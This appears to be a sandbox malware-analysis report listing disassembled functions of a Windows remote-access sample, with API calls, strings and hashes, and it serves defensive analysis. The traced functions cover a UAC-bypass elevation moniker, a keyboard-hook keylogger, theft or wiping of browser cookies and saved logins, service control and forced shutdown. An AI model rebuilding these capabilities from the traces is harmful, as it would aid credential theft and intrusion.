                                                                                          • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                          Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0040755C
                                                                                          • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object_wcslen
                                                                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                          • API String ID: 240030777-3166923314
                                                                                          • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                          • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                          • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                          • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                          Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                          • GetLastError.KERNEL32 ref: 0041A84C
                                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                          • String ID:
                                                                                          • API String ID: 3587775597-0
                                                                                          • Opcode ID: 7c9047ccdf8dbfe0cedaf63b80d6fa4b4da9c7c1e4027b9493b0733bf6fd85a3
                                                                                          • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                          • Opcode Fuzzy Hash: 7c9047ccdf8dbfe0cedaf63b80d6fa4b4da9c7c1e4027b9493b0733bf6fd85a3
                                                                                          • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                          Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                          • API String ID: 1164774033-405221262
                                                                                          • Opcode ID: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                                                          • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                          • Opcode Fuzzy Hash: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                                                          • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                          Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                          • String ID:
                                                                                          • API String ID: 2341273852-0
                                                                                          • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                          • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                          • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                          • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                          Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                          • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                          • GetLastError.KERNEL32 ref: 0040A328
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                                                          • TranslateMessage.USER32(?), ref: 0040A385
                                                                                          • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                          Strings
                                                                                          • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                          • String ID: Keylogger initialization failure: error
                                                                                          • API String ID: 3219506041-952744263
                                                                                          • Opcode ID: fc27e46cae71e48e676fe4f224a22039b8de20a8564221e2638cded3f863b4df
                                                                                          • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                                          • Opcode Fuzzy Hash: fc27e46cae71e48e676fe4f224a22039b8de20a8564221e2638cded3f863b4df
                                                                                          • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                                                          Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 0040A451
                                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                          • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                                          • GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                          • GetKeyboardState.USER32(?), ref: 0040A479
                                                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 1888522110-0
                                                                                          • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                          • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                          • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                          • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                          Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                          • API String ID: 2127411465-314212984
                                                                                          • Opcode ID: 0f6b8dc58b31b4decc9496a35d1780b66657e1a1c5e00cff670ac627aeb7fae8
                                                                                          • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                          • Opcode Fuzzy Hash: 0f6b8dc58b31b4decc9496a35d1780b66657e1a1c5e00cff670ac627aeb7fae8
                                                                                          • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                          Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                            • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                            • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                            • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                            • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                          • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                          • API String ID: 1589313981-2876530381
                                                                                          • Opcode ID: 558271a35a8bdba10085a696c11b9306f9ed655432d6f63f913a34884c8f5c77
                                                                                          • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                          • Opcode Fuzzy Hash: 558271a35a8bdba10085a696c11b9306f9ed655432d6f63f913a34884c8f5c77
                                                                                          • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                          Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                          • GetLastError.KERNEL32 ref: 0040BA93
                                                                                          Strings
                                                                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                          • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                          • UserProfile, xrefs: 0040BA59
                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteErrorFileLast
                                                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                          • API String ID: 2018770650-1062637481
                                                                                          • Opcode ID: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                                                          • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                          • Opcode Fuzzy Hash: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                                                          • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                          Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                          • GetLastError.KERNEL32 ref: 004179D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                          • String ID: SeShutdownPrivilege
                                                                                          • API String ID: 3534403312-3733053543
                                                                                          • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                          • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                          • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                          • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                          Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00409293
                                                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                          • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                            • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                            • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                            • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                          • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                          • String ID:
                                                                                          • API String ID: 1824512719-0
                                                                                          • Opcode ID: cd608265bd1be8b07682067f0b9d09a1daa7a366b7b1d0b2306626e8246afaf9
                                                                                          • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                                          • Opcode Fuzzy Hash: cd608265bd1be8b07682067f0b9d09a1daa7a366b7b1d0b2306626e8246afaf9
                                                                                          • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                          Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                          • String ID:
                                                                                          • API String ID: 276877138-0
                                                                                          • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                          • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                          • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                          • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                          Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00452555
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0045257E
                                                                                          • GetACP.KERNEL32 ref: 00452593
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                          • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                          • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                          • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                          Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                                                          • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                          • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                          • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                          • String ID: SETTINGS
                                                                                          • API String ID: 3473537107-594951305
                                                                                          • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                          • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                                          • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                          • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                                          Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 004096A5
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstH_prologNext
                                                                                          • String ID:
                                                                                          • API String ID: 1157919129-0
                                                                                          • Opcode ID: 0d9b42017be71501d33dbc29ad810fbbdc579c8f6a897c623fd1351d11184fdc
                                                                                          • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                                          • Opcode Fuzzy Hash: 0d9b42017be71501d33dbc29ad810fbbdc579c8f6a897c623fd1351d11184fdc
                                                                                          • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                          Function 00452690 Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                          • GetUserDefaultLCID.KERNEL32 ref: 0045279C
                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0045286D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
